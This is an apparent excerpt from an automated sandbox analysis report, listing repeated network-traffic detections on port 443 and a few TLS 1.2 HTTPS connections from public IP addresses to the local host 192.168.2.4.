                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49763 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49940 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49949 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.4:49946 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49971 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49982 version: TLS 1.2
